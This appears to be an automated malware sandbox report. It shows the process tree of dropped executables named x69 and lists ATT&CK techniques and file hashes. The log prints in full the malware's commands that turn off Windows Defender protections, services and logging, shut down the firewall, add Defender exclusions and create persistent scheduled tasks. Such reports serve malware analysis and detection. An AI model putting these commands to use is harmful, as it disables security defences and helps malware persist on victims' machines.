C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4388 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:4348
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:388 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:1744
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2796 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4064
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:5000
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:1740
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:2412
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:2972
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4808
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4216
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4916
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:1852
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5876
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:6072
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:2020
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:4816
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:3880
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:4824
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:4660
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:3040
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:920
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:4524
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:5580
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:4380
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:1944
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:5532
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:2388
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5540
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:3964
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:3160
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:1984
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:436
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:4340
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:2296
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:5584
-
-
C:\Users\Admin\AppData\Roaming\x69install.exe"C:\Users\Admin\AppData\Roaming\x69install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exeC:\Users\Admin\AppData\Local\Temp\iyMbXS.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4472 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\18f81da6.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:4812
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4984
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5772
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4724
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exeC:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:640 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\45fa18db.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:2716 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3912
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\923D.tmp\923E.tmp\923F.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5584 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:5900
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3744 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:5812
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4128 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4428
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:2168
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:4852
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:2728
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:5804
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:2052
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4528
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3484
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:2376
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:2896
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:1492
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:3012
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:5900
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:1488
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:4488
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:2608
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:1596
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:4780
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:5236
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:4644
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:5076
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:2536
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:4964
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:2576
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:2664
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:4492
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6060
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:3512
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5908
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5400
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:1576
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe2⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Users\Admin\AppData\Roaming\x69install.exeC:\Users\Admin\AppData\Roaming\x69install.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2356
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3668
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3844
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:4008
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:2024
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:5204
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:5332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2908
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3432
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:5624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:5084
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1668
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5756
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3224
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:4576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:5868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:2392
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4956
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:468
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv rxwFBNp42kmv9L8vTNvaXw.0.21⤵PID:2896
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:1820
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:920
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:4580
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD5405c009705fcdc96c87578c57acccf0c
SHA11fa7e550b30f2c4261c70804e17691841b9a6d2b
SHA256bfb7d35e37adabb0647e854d881bce44f69dc63cd3447b08c086254cd1a4e5ae
SHA512e5377852087335bed3c8598425f5398b9eded1cebba01358f54147d7fc7f54adcce7a3281005c94948e706314a3a652d1cbc2d8e013a5e44439aa217840ea986
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
1B
